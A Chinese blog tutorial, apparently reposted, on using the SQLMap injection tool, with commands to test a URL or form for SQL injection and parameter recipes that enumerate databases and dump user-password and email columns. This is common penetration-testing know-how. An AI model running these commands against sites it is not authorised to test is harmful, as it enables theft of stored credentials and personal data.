SQLMap常用教程

朱雀 2023-06-01 08:47 208阅读 0赞

#### 先安装 python环境（2.6.x或2.7版本） ，再将SQLMap 放在安装目录下 ####

注意：sqlmap只是用来检测和利用sql注入点的，并不能扫描出网站有哪些漏洞，使用前请先使用扫描工具扫出sql注入点。

检测注入点是否可用 -u ：注入点url

sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

检测表单post提交 注入

sqlmap.py -u "http://192.168.1.150/products.asp" --forms

指定请求文件进行验证注入,可以用fiddle拦截请求并保存为文件  
![image][]

sqlmap.py -r "C:\Users\Administrator\Desktop\RawFile.html" --dbs

#### 常用参数简介 ####

**注意大小写和前面的横杠数量**

> \--dbs //指定输出所有数据库名称  
> \--current-db //输出web当前使用数据库  
> \--current-user //输出当前数据库用户名称  
> \--users //输出所有用户名称  
> \--passwords //输出所有用户密码  
> \--tables //输出所有表名称  
> \--columns //输出所有字段名称  
> \--dump //导出结果  
> \--technique //设置用于注入的技术  
> \--dbms //指定测试的数据库类型  
> \--start //指定开始的行  
> \--stop //指定结束的行  
> \-D //指定数据库名称  
> \-T //指定表名称  
> \-C //指定字段名称  
> \-u //指定进行sql注入的http地址  
> \-p //指定进行sql注入的参数  
> \-r //指定进行sql注入的请求文件

#### 常用参数搭配 ####

1.输出DatabaseName数据库中所有表名称

-D DatabaseName --tables

2.输出DatabaseName数据库users表中的所有字段名称

-D DatabaseName -T users --columns

3.导出DatabaseName数据库users表中UserName,UserPassword字段数据

-D DatabaseName -T users -C "email,Username,userpassword" --dump

4.导出从1到10的10行数据

-D DatabaseName -T users -C "email,Username,userpassword" --start 1 --stop 10 --dump

转载于:https://www.cnblogs.com/cplemom/p/11406080.html

[image]: /images/20230601/a8ef70a0e45249118962c19e8b78d145.png

发表评论取消回复

表情：

评论列表（有 0 条评论，208人围观）

还没有评论，来说两句吧...

相关阅读

相关 Sqlmap注入常用命令

sqlmap -r http.txt \http.txt是我们抓取的http的请求包 sqlmap -r http.txt -p username \指定参数，当有多个参数

约定不等于承诺〃/ 2023年10月06日 16:55/ 0 赞/ 41 阅读

相关 SQLMap的入门教程

什么是SQLMap？ sqlmap是一个自动化的sql注入工具，其主要功能是扫描、发现并利用给定URL的SQL注入漏洞，还可以检测XSS漏洞，内置了很多绕

一时失言乱红尘/ 2023年06月08日 11:00/ 0 赞/ 2 阅读

相关 SQLMap常用教程

先安装 python环境（2.6.x或2.7版本），再将SQLMap 放在安装目录下注意：sqlmap只是用来检测和利用sql注入点的，并不能扫描出网站有哪些漏洞，使

朱雀/ 2023年06月01日 08:47/ 0 赞/ 209 阅读

相关 Windows下Sqlmap环境安装教程详解

更多编程教程请到：[菜鸟教程][Link 1] https://www.piaodoo.com/ Sqlmap安装 Sqlmap >> 基于Python的自动化渗透测试工具

我会带着你远行/ 2022年12月20日 05:48/ 0 赞/ 216 阅读

相关渗透测试工具sqlmap基础教程

转载请注明出处：http://blog.csdn.net/zgyulongfei/article/details/41017493 作者：羽龍飛本文仅

深碍√TFBOYSˉ_/ 2022年08月21日 01:17/ 0 赞/ 229 阅读

相关 SQLMAP

SQL分类：按照数据类型分：整型注入、字符型注入按照注入语法分类： UNION query SQL injection(可联合查询注入) Error-based

青旅半醒/ 2022年05月30日 05:53/ 0 赞/ 236 阅读

相关 SQLMAP常用参数的中文解释

SQLMAP是一款基于python开发的SQL注入工具，几乎支持现在所有的数据库，功能非常强大。由于是国外的产品，所以对于我这种英语水平不高的菜鸟来说，使用起来会有点困难。虽然

朴灿烈づ我的快乐病毒、/ 2021年12月24日 08:17/ 0 赞/ 280 阅读

相关 sqlmap常用笔记

在测试项目的时，要比较快的测试查询，同时每个参数都要测试，会比较依赖sqlmap（扫的时候顺便手工测别的这里记一下常用的命令 \-u 直接读url （需要加cookie等

谁借莪１个温暖的怀抱￠/ 2021年11月17日 17:56/ 0 赞/ 320 阅读

相关安装教程---常用软件

java [Linux下安装java及配置(yum安装) - 天道酬勤，坚持！ - 博客园 (cnblogs.com)][Linux_java_yum_ - _ - _ _c

偏执的太偏执、/ 2021年09月22日 01:24/ 0 赞/ 413 阅读

相关渗透测试——sql注入神器-sqlmap 常用tamper脚本及编写

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

客官°小女子只卖身不卖艺/ 2021年07月25日 14:40/ 0 赞/ 509 阅读